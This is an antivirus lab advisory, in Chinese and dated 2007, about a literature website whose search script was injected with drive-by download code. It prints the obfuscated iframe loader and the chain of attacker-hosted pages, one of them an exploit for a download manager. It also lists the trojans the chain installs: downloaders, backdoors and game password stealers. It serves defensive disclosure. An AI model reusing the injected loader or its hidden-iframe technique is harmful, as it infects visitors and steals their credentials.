出处:安天实验室 2007-11-15 11:30
11月15日,安天实验室反病毒监测网发现,八文网网站(http://www.8***.com /search/docs/%CF%D6%B4%FA%CA%AB/1)被黑客植入病毒,用户如果访问该网站,会被 病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。有可能被远程控制, 盗取用户敏感信息等。 该网站的主页里的http://www.8***.com/js/search_bot.js被插入如下挂马代码: var strBegin = "<i" + "fr" + "ame src=\"ht"; document.writeln( strBegin + "tp:\/\/60." + "190.10" + "1." + "2" + "06\/m1.h" + "tm?9792\" width=\"20\" height=\"0\" fr" + "amebo"); document.writeln(strEnd); 使用了字符变量,仔细分析得到连接地址:http://60.190.101.***/m1.htm?9792 访问该地址得到代码: 很多挂马地址。 <HTML> <script src=http://60.190.101.***/aa/aa.js></script> </HTML> <iframe src="http://60.190.101.***/aa/aa1.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa2.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa3.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa4.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa5.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa6.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="http://60.190.101.***/aa/aa.htm" width="20" height="0" frameborder="0"></iframe> http://60.190.101.***/aa/aa.js为加密网马: http://60.190.101.***/aa/aa1.htm 被插入:http://60.190.101.***/aa/ccc1.js http://60.190.101.***/aa/ccc1.js得到挂马代码: http://60.190.101.***/aa/aa2.htm代码: http://60.190.101.***/aa/aa3.htm被插入: <script language=javascript src=http://60.190.101.***/aa/xl.js></script> http://60.190.101.***/aa/xl.js为讯雷漏洞网马: http://60.190.101.***/aa/aa4.htm代码: http://60.190.101.***/aa/aa5.htm 被插入: script language=javascript src=http://60.190.101.***/aa/bb.js></script> http://60.190.101.***/aa/bb.js的代码: http://60.190.101.***/aa/aa6.htm得到代码: http://60.190.101.***/aa/aa.htm代码: 当用户访问http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1时, 系统会自动隐藏下载以下病毒文件: http://60.190.101.***/abc.exe 病毒名:(Worm.Win32.Downloader.f) 蠕虫下载者木马 http://60.190.101.***/aa1.exe 病毒名:(Trojan-Downloader.Win32.Delf.aas) 下载者木马 一旦运行该木马将下载以下病毒到用户的系统,并运行。 http://60.190.101.***/aa2.exe 病毒名:(Backdoor.Win32.Agent.afh) 后门木马 http://60.190.101.***/aa3.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hpj) 盗号木马 http://60.190.101.***/aa4.exe 病毒名:(rojan-PSW.Win32.OnLineGames.hqn) 盗号木马 http://60.190.101.***/aa5.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.fyn) 游戏盗号木马 http://60.190.101.***/aa6.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gny) 游戏盗号木马 http://60.190.101.***/aa7.exe 病毒名:(Trojan-Downloader.Win32.Agent.blm) 下载者木马 http://60.190.101.***/aa8.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gti) 盗号木马 http://60.190.101.***/aa9.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hqy) 游戏木马 http://60.190.101.***/aa10.exe 病毒名:(Trojan-PSW.Win32.Lmir.bos) 游戏木马 http://60.190.101.***/aa11.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gxb) 游戏盗号木马 http://60.190.101.***/aa12.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hcp) 游戏盗号木马 http://60.190.101.***/aa13.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hnt) 游戏盗号木马 http://60.190.101.***/aa14.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hqc) 游戏盗号木马 http://60.190.101.***/aa15.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hfd) 游戏木马 http://60.190.101.***/aa16.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hfr) 游戏盗号木马 http://60.190.101.***/aa17.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hqx) 游戏木马 http://60.190.101.***/aa18.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hqh) 游戏木马 http://60.190.101.***/aa19.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hre) 游戏木马 http://60.190.101.***/aa20.exe 病毒名:(Backdoor.Win32.Delf.awy) 后门木马 http://60.190.101.***/aa21.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.ghq) 游戏木马
点击此处下载木马防线2005+
病毒上报信箱: submit@virusview.net
内容:
病毒上报信箱: